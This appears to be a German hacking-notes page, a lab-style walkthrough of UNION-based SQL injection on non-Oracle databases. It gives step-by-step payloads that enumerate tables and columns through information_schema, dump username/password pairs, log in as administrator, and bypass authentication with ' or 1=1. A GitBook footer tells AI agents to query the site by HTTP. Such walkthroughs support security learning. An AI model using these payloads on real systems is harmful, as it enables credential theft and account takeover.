> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/sql-injection/non-oracle-database-enumeration.md).

# Aufzählung nicht-Oracle-Datenbanken

### SQL-Injection-Angriff, Auflisten des Datenbankinhalts auf Nicht-Oracle-Datenbanken

#### Kontext

* Anfälliger Parameter: `Kategorie` Filter (Injektion über `WHERE`).
* Die Anwendung gibt SQL-Ergebnisse in der Antwort zurück und ermöglicht `UNION`-basierte Extraktion.

#### Ziel

* Identifizieren Sie den Namen der Tabelle, die die Anmeldedaten enthält, entdecken Sie ihre Spalten, extrahieren Sie `Benutzernamen` / `Passwort` Paare und verbinden Sie sich als `Administrator`.

#### Vorgehensweise (knappe Phasen)

1. **Anzahl der Spalten bestimmen**/ Beispiel:

   ```sql
   ' ORDER BY 2-- -
   ' ORDER BY 3-- -
   ```

* Erhöhen Sie den Index, bis ein Fehler auftritt → so kennen Sie die Anzahl der Spalten für `UNION`.

2. **Validieren `UNION SELECT`**/ Beispiel (2 Spalten):

   ```sql
   ' UNION SELECT '1','2'-- -
   ```

* An die zurückgegebenen N Spalten anpassen (verwenden Sie `NULL` für irrelevante Spalten).

3. \*\* Tabellen auflisten\*\* (Nicht-Oracle-Basis — `information_schema`)

   ```sql
   ' UNION SELECT NULL, table_name
     FROM information_schema.tables
     WHERE table_schema = 'public'-- -
   ```

* Ermöglicht das Auflisten von Tabellen im `public` Schema (Postgres/MySQL-kompatibel).

4. Spalten einer identifizierten Tabelle auflisten

```sql
' UNION SELECT NULL, column_name
  FROM information_schema.columns
  WHERE table_schema = 'public' AND table_name = 'users_arejzy'-- -
```

* Ersetzen Sie `users_arejzy` durch die gefundene Tabelle.

5. Inhalt extrahieren (Dump)

Beispiel (identifizierte Spalten password/ qxbwwb, username/ lidnwi):

```sql
' UNION SELECT password_qxbwwb, username_lidnwi
  FROM users_arejzy-- -
```

* Passen Sie die Reihenfolge/den Typ der Spalten an die anfällige Anfrage an (verwenden Sie `CAST`/`CONCAT`/`NULL` falls erforderlich).

6. Bypass / Anmeldung

* Sobald Benutzername = administrator und das Passwort wiederhergestellt ist, verbinden Sie sich über die Authentifizierungsseite.
* Alternativ können Sie einen Payload zum Umgehen der Authentifizierung verwenden, wenn die Tabelle nicht direkt zugänglich ist (z. B. Benutzername = ' or 1=1-- -), aber die direkte Exfiltration ist für den Nachweis vorzuziehen.

#### Erwartetes Ergebnis

* Liste der Tabellennamen, Spalten, dann Anmeldedaten dumpen.
* Erfolgreiche Verbindung als `Administrator` unter Verwendung exfiltrierter Anmeldedaten.

#### Auswirkungen

* Konten kompromittieren (vollständige Eskalation, falls Admin), sensible Informationen extrahieren, Daten ändern/löschen, mögliche Erpressung.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/sql-injection/non-oracle-database-enumeration.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
